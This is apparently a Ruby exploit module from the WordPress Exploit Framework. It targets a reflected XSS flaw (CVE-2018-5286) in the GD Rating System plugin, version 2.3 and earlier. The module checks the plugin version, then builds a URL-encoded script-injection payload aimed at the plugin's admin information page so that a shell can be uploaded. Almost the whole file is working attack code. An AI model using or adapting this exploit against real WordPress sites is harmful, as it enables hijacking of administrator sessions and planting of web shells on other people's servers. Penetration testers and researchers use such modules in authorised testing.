# frozen_string_literal: true

class Wpxf::Exploit::GdRatingSystemReflectedXssShellUpload < Wpxf::Module
  include Wpxf::WordPress::ReflectedXss

  def initialize
    super

    update_info(
      name: 'GD Rating System <= 2.3 Reflected XSS Shell Upload',
      author: [
        'd4wner',   # Dislosure
        'rastating' # WPXF module
      ],
      references: [
        ['CVE', '2018-5286'],
        ['WPVDB', '8995']
      ],
      date: 'Jan 08 2018'
    )
  end

  def check
    check_plugin_version_from_changelog('gd-rating-system', 'readme.txt', '2.4')
  end

  def xss_payload
    url_encode("\"><script>#{xss_ascii_encoded_include_script}</script><!--")
  end

  def url_with_xss
    "#{wordpress_url_admin_options}?page=gd-rating-system-information&panel=#{xss_payload}"
  end
end
